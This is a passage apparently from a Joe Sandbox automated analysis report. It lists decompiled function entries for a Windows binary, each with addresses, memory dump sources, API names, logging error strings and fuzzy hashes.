                    • Instruction Fuzzy Hash: 53212C32A08AC282E755DF19E88017867A4FB45BD4B544135DB9D87768DF3CE945E700
                    Function 00007FF7088726AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: a705a9e8397c2a0e157e5c4623b06167a9953578c27c6b65fef050b1d192d77b
                    • Instruction ID: fc4d0e07c66e5e6dd921146151fea6099c7eb3f5b1ecac4947582cdd9f0cbcdd
                    • Opcode Fuzzy Hash: a705a9e8397c2a0e157e5c4623b06167a9953578c27c6b65fef050b1d192d77b
                    • Instruction Fuzzy Hash: 56F05427B2860341F562FA04BD51FB9D1521F417A8EC94535CD5E0B6D1AF3DD8E7C228
                    Function 00007FF7088726B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 50ddab41c2895b9b22a4d4635a104b7c26654cb7d37fed117f5fd98ba531e54b
                    • Instruction ID: 27658a0b7162c1c32d9d3ebe27860d9e8c90410d881095c918d585898f14ce0d
                    • Opcode Fuzzy Hash: 50ddab41c2895b9b22a4d4635a104b7c26654cb7d37fed117f5fd98ba531e54b
                    • Instruction Fuzzy Hash: C2F05427B2860341F562FA04BD51FB9D1511F417A8EC94535CD5E0B6D1AF3DE8E7C228
                    Function 00007FF70887269D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 298fcd67afb21f34e54bbad9e7584857e5bbec19edc43fb558493789f31abe6c
                    • Instruction ID: 33e429f35f9037154bddea94685311d94780c043832c7b0ff2e3ae928c21461a
                    • Opcode Fuzzy Hash: 298fcd67afb21f34e54bbad9e7584857e5bbec19edc43fb558493789f31abe6c
                    • Instruction Fuzzy Hash: CFF05427B2860341F562FA04BD51FB9D1512F417A4EC94535CD5D0B6D1AF3DD8E7C228
                    Function 00007FF7088726A4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: de9fe99c49374705cdcb2ee0732af089202a8badd931d2ba541aeaae33d80ef1
                    • Instruction ID: 1982a6ec56c5d65f519c7a76dba285769735694fa4aeeea8f3f1923df98d5f5c
                    • Opcode Fuzzy Hash: de9fe99c49374705cdcb2ee0732af089202a8badd931d2ba541aeaae33d80ef1
                    • Instruction Fuzzy Hash: 86F0B423B2860341F562FA04BD50FB8D1111F407A8EC94531CD4E0B2D1AF3CD8E7C228
                    Function 00007FF7088726D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 298fcd67afb21f34e54bbad9e7584857e5bbec19edc43fb558493789f31abe6c
                    • Instruction ID: 33e429f35f9037154bddea94685311d94780c043832c7b0ff2e3ae928c21461a
                    • Opcode Fuzzy Hash: 298fcd67afb21f34e54bbad9e7584857e5bbec19edc43fb558493789f31abe6c
                    • Instruction Fuzzy Hash: CFF05427B2860341F562FA04BD51FB9D1512F417A4EC94535CD5D0B6D1AF3DD8E7C228
                    Function 00007FF7088726B9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: a09d7dc10f7d908e29253be61fa3c9b9b29b600e8bb5bbe80d6b09c93456bd94
                    • Instruction ID: 10d1004616132549f8f6512c7385b04f39329ef44a03364ddad20f1463ff0b50
                    • Opcode Fuzzy Hash: a09d7dc10f7d908e29253be61fa3c9b9b29b600e8bb5bbe80d6b09c93456bd94
                    • Instruction Fuzzy Hash: D9F05427B2860341F562FA04BD51FB9D1511F417A8EC94535CD5E0B6D1AF3DD8E7C228
                    Function 00007FF7088726EB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 50ddab41c2895b9b22a4d4635a104b7c26654cb7d37fed117f5fd98ba531e54b
                    • Instruction ID: 27658a0b7162c1c32d9d3ebe27860d9e8c90410d881095c918d585898f14ce0d
                    • Opcode Fuzzy Hash: 50ddab41c2895b9b22a4d4635a104b7c26654cb7d37fed117f5fd98ba531e54b
                    • Instruction Fuzzy Hash: C2F05427B2860341F562FA04BD51FB9D1511F417A8EC94535CD5E0B6D1AF3DE8E7C228
                    Function 00007FF7088726F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: a09d7dc10f7d908e29253be61fa3c9b9b29b600e8bb5bbe80d6b09c93456bd94
                    • Instruction ID: 10d1004616132549f8f6512c7385b04f39329ef44a03364ddad20f1463ff0b50
                    • Opcode Fuzzy Hash: a09d7dc10f7d908e29253be61fa3c9b9b29b600e8bb5bbe80d6b09c93456bd94
                    • Instruction Fuzzy Hash: D9F05427B2860341F562FA04BD51FB9D1511F417A8EC94535CD5E0B6D1AF3DD8E7C228
                    Function 00007FF7088726DD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: de9fe99c49374705cdcb2ee0732af089202a8badd931d2ba541aeaae33d80ef1
                    • Instruction ID: 1982a6ec56c5d65f519c7a76dba285769735694fa4aeeea8f3f1923df98d5f5c
                    • Opcode Fuzzy Hash: de9fe99c49374705cdcb2ee0732af089202a8badd931d2ba541aeaae33d80ef1
                    • Instruction Fuzzy Hash: 86F0B423B2860341F562FA04BD50FB8D1111F407A8EC94531CD4E0B2D1AF3CD8E7C228
                    Function 00007FF7088726E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: a705a9e8397c2a0e157e5c4623b06167a9953578c27c6b65fef050b1d192d77b
                    • Instruction ID: fc4d0e07c66e5e6dd921146151fea6099c7eb3f5b1ecac4947582cdd9f0cbcdd
                    • Opcode Fuzzy Hash: a705a9e8397c2a0e157e5c4623b06167a9953578c27c6b65fef050b1d192d77b
                    • Instruction Fuzzy Hash: 56F05427B2860341F562FA04BD51FB9D1521F417A8EC94535CD5E0B6D1AF3DD8E7C228
                    Function 00007FF7088727ED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 501eaeb97dbac1df9fcaba078b8d61f5e06c93d59369ef5f639b3344c7c75b83
                    • Instruction ID: fccfc376f12cf1ab476ed5f5a51ea93af8290e7ac365c71c3068c3f1c163ec4c
                    • Opcode Fuzzy Hash: 501eaeb97dbac1df9fcaba078b8d61f5e06c93d59369ef5f639b3344c7c75b83
                    • Instruction Fuzzy Hash: 16F03A23B2860341F962FA14BD51BB9D1622F817A4E894535CD5D0B6D1AF3DE8E6C228
                    Function 00007FF7088727F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 25f826796ae9e738d7729b61ebed9bf6ac66255cb3ee187e25fa9c0c7a2a501c
                    • Instruction ID: b7cd3beb76b2cb6d174fb6b88ed5ce18ce556a91260d0f63c9a5825723f6552a
                    • Opcode Fuzzy Hash: 25f826796ae9e738d7729b61ebed9bf6ac66255cb3ee187e25fa9c0c7a2a501c
                    • Instruction Fuzzy Hash: C9F09023B2860341F562FA047D50BB8D1511F407A4E894531CD4D0B6C1AF3CD8E6C228
                    Function 00007FF708872801 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 83db9f7145f0bb9a5f1ecf69a8e3f78fdb291c693cb0dad6356e651c7d4eb26c
                    • Instruction ID: 287f8eb3a2099a51223763ce2443cb4132be4e9cb985749dc14a4966b29b6b7c
                    • Opcode Fuzzy Hash: 83db9f7145f0bb9a5f1ecf69a8e3f78fdb291c693cb0dad6356e651c7d4eb26c
                    • Instruction Fuzzy Hash: EAF03023A2860341F562FA147D51BB9D1521F417A4E894535CD5D0B6D1AF3DD8E6C228
                    Function 00007FF8BFB59A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: e0851725d79fa95748260dbe6cd32e6c1aaac29318307fe0d0a66a5108b9946e
                    • Instruction ID: 245565dd909de259445d6a175790bd5f1e4e4d6fbed27ea345bc81cd26c0e710
                    • Opcode Fuzzy Hash: e0851725d79fa95748260dbe6cd32e6c1aaac29318307fe0d0a66a5108b9946e
                    • Instruction Fuzzy Hash: 14F09062A0874A52F6528F88F9507B97354BF447E4F480236EF5D46A90EF3DE9999300
                    Function 00007FF8BFB599BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: be87ca2da0906a4b563e4e802efae5fe8a631e34ae087ba0a1cce180adca3898
                    • Instruction ID: c30fd3d5ff122b2e3da23e97c3b6e3aefb9d3525ce11ba51b10938096c705d9a
                    • Opcode Fuzzy Hash: be87ca2da0906a4b563e4e802efae5fe8a631e34ae087ba0a1cce180adca3898
                    • Instruction Fuzzy Hash: 68F09062A0874A52F5528F88B9507B9B354AF447E4F480236EF5D46A90EF3DE9999300
                    Function 00007FF8BFB599AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 43db66ee65da957a1449361e24969b174e734d57be6334d49a96190eb8423e72
                    • Instruction ID: b336394e2dc9d79598424f183d468c56f0e70399b5b51cb1ca8cb4cf78a4fcf7
                    • Opcode Fuzzy Hash: 43db66ee65da957a1449361e24969b174e734d57be6334d49a96190eb8423e72
                    • Instruction Fuzzy Hash: 01F09062A0874A52F5528F88B9507B97358AF447E4F480236EF5D46690EF3DEA999300
                    Function 00007FF8BFB5991D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 1f8b6be4531e4f61a9b791164e86e5d65f11346d678c3961dc24315970669e59
                    • Instruction ID: b45ef00d2f7cad4a9e37787a2930321725fc9a89bb1f08694697b8f22e4b96dd
                    • Opcode Fuzzy Hash: 1f8b6be4531e4f61a9b791164e86e5d65f11346d678c3961dc24315970669e59
                    • Instruction Fuzzy Hash: 7AF0F022A0830A42F5528F88B9503B97344AF443E4F480236EF4D46690EF3CE9898300
                    Function 00007FF8BFB59927 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 5e972d20f0db2410af95bb835652d4743476dec15b4255502ad73526abce4442
                    • Instruction ID: 0d88343078784fb747fad59486f2042eb4061bbf5d247dc76a56060d534d4796
                    • Opcode Fuzzy Hash: 5e972d20f0db2410af95bb835652d4743476dec15b4255502ad73526abce4442
                    • Instruction Fuzzy Hash: 75F09062A0864A52F5628F88F9507B97354BF447E4F480236EF5D466D0EF3DE9999300
                    Function 00007FF8BFB8D8E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
